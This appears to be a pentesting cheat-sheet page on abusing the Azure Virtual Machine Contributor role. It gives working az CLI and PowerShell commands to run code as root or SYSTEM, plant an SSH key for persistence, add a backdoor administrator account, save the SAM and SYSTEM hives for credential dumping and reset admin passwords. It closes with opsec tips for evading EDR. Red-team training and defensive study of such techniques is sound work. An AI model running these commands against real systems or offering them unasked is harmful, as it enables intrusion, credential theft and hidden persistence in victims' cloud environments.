🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / AZVMContributor

AZVMContributor

The source principal has the Virtual Machine Contributor role on the target VM, enabling full VM management including running commands as SYSTEM/root.

Applies to: User / ServicePrincipal β†’ AZVM

Linux Abuse

Run arbitrary command as root (Linux VM)

az login --service-principal -u <app-id> -p '<secret>' --tenant <tenant-id>

az vm run-command invoke \
  --resource-group <resource-group> \
  --name <vm-name> \
  --command-id RunShellScript \
  --scripts "id && cat /root/root.txt"

Drop SSH key for persistence

az vm run-command invoke \
  --resource-group <resource-group> \
  --name <vm-name> \
  --command-id RunShellScript \
  --scripts "mkdir -p /root/.ssh && echo '<your-pub-key>' >> /root/.ssh/authorized_keys && chmod 600 /root/.ssh/authorized_keys"

Run arbitrary command as SYSTEM (Windows VM)

az vm run-command invoke \
  --resource-group <resource-group> \
  --name <vm-name> \
  --command-id RunPowerShellScript \
  --scripts "whoami; hostname; net user hacker P@ssw0rd123! /add; net localgroup administrators hacker /add"

Dump SAM/NTDS via run-command

az vm run-command invoke \
  --resource-group <resource-group> \
  --name <vm-name> \
  --command-id RunPowerShellScript \
  --scripts "reg save HKLM\SAM C:\sam.bak; reg save HKLM\SYSTEM C:\sys.bak"

Windows Abuse

PowerZure β€” run command

Connect-AzAccount -AccessToken <access-token> -AccountId <username>

# Execute arbitrary PowerShell as SYSTEM
Invoke-AzureRunCommand -ResourceGroup <resource-group> -VM <vm-name> -Command 'whoami'

# Run via MSBuild (evasion)
Invoke-AzureRunMSBuild -ResourceGroup <resource-group> -VM <vm-name>

# Execute a program
Invoke-AzureRunProgram -ResourceGroup <resource-group> -VM <vm-name> `
  -Program 'cmd.exe' -Arguments '/c whoami > C:\out.txt'

Az PowerShell β€” run command

Connect-AzAccount -AccessToken <access-token> -AccountId <username>

Invoke-AzVMRunCommand `
  -ResourceGroupName <resource-group> `
  -VMName <vm-name> `
  -CommandId RunPowerShellScript `
  -ScriptString 'whoami; hostname; ipconfig /all'

Reset VM admin password

$cred = Get-Credential
Set-AzVMAccessExtension `
  -ResourceGroupName <resource-group> `
  -VMName <vm-name> `
  -Name "VMAccessAgent" `
  -Credential $cred `
  -TypeHandlerVersion "2.0"

Az CLI β€” reset admin password

az vm user update \
  --resource-group <resource-group> \
  --name <vm-name> \
  --username Administrator \
  --password '<new-password>'

Opsec

  • run-command execution is logged in Azure Activity Log and leaves files under C:\Packages\Plugins\ on Windows.
  • PowerShell script block logging and command line logging on the VM will capture payload content.
  • EDR on the guest OS may flag process injection, MSBuild execution, or suspicious commands.
  • Use Invoke-AzureRunMSBuild or signed LOLBin delivery for EDR evasion.
  • Prefer dropping a scheduled task or SSH key over repeated run-command calls.